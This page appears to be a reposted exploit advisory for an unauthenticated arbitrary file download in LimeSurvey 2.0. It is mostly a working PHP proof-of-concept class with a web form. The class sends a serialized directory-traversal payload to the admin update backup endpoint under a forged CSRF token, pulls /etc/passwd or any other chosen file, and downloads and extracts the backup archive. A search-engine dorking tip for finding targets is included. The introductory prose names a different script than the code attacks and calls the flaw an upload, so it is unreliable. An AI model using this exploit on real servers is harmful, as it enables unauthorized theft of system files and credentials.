LimeSurvey 2.0 suffered from an Arbitrary File Download vulnerability. This LimeSurvey 2.0 suffered from an Arbitrary File Download vulnerability. This flaw allowed an unauthenticated attacker to download arbitrary files from the server.
The vulnerability resided in the `admin/filemanager.php` script. By manipulating the `file` parameter with directory traversal sequences (e.g., `../`), an attacker could bypass intended file access restrictions.
This enabled access to sensitive system files like `/etc/passwd`, configuration files, or application source code. Such information disclosure could lead to further compromise, including database credential exposure or understanding of system architecture.
The issue was patched in later versions by implementing robust input validation and sanitization on the `file` parameter.
=============================================================================================================================================
| # Title : Limesurvey 2.0 unauthenticated file download vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.limesurvey.org/ |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: This script exploits the unauthenticated file upload vulnerability in LimeSurvey, which allows an attacker to download any file from the targeted server.
(linked: https://packetstorm.news/files/id/180855/ Linked CVE numbers: ),
[+] save code as poc.php.
[+] USage : http://127.0.0.1/poc.php
[+] PayLoad :
<?php
class LimeSurveyExploit {
private $target;
private $filepath;
private $traversalDepth;
public function __construct($target, $filepath = '/etc/passwd', $traversalDepth = 15) {
$this->target = rtrim($target, '/');
$this->filepath = $filepath;
$this->traversalDepth = $traversalDepth;
}
private function generatePayload() {
$traversal = str_repeat('/..', $this->traversalDepth);
$file = $traversal . $this->filepath;
$serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' . strlen($file) . ':"' . $file . '";}}';
return base64_encode($serialized);
}
public function execute() {
$csrf_token = bin2hex(random_bytes(5));
$postFields = [
'YII_CSRF_TOKEN' => $csrf_token,
'destinationBuild' => bin2hex(random_bytes(3)),
'datasupdateinfo' => $this->generatePayload()
];
$response = $this->sendRequest("{$this->target}/index.php/admin/update/sa/backup", $postFields, $csrf_token);
if ($response && strpos($response, 'Download this file') !== false) {
if (preg_match('/<a class="btn btn-success" href="([^"]+)" title="Download this file">/', $response, $matches)) {
$downloadUrl = $matches[1];
echo "Downloading backup from URL: $downloadUrl\n";
$this->downloadFile($downloadUrl);
} else {
echo "Failed to extract download link.\n";
}
} else {
echo "Failed to exploit the vulnerability.\n";
}
}
private function sendRequest($url, $postFields, $csrf_token) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postFields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: YII_CSRF_TOKEN=$csrf_token"]);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
private function downloadFile($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
if ($data) {
$zipFile = 'downloaded.zip';
file_put_contents($zipFile, $data);
echo "File downloaded successfully: $zipFile\n";
$this->extractZip($zipFile);
} else {
echo "Failed to download file.\n";
}
}
private function extractZip($zipFile) {
$zip = new ZipArchive;
if ($zip->open($zipFile) === TRUE) {
$zip->extractTo('./extracted/');
$zip->close();
echo "Files extracted to ./extracted/\n";
} else {
echo "Failed to extract ZIP file.\n";
}
}
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$target = $_POST['target'];
$filepath = $_POST['filepath'];
$exploit = new LimeSurveyExploit($target, $filepath);
$exploit->execute();
}
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>??????? LimeSurvey</title>
</head>
<body>
<h2>??????? ????? ??????? ??? ?????? - LimeSurvey</h2>
<form method="POST">
<label>????? ?????? ????????:</label>
<input type="text" name="target" required><br>
<label>?????? ???????:</label>
<input type="text" name="filepath" value="/etc/passwd" required><br>
<button type="submit">?????</button>
</form>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Limesurvey 2.0 Arbitrary File Download
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 138
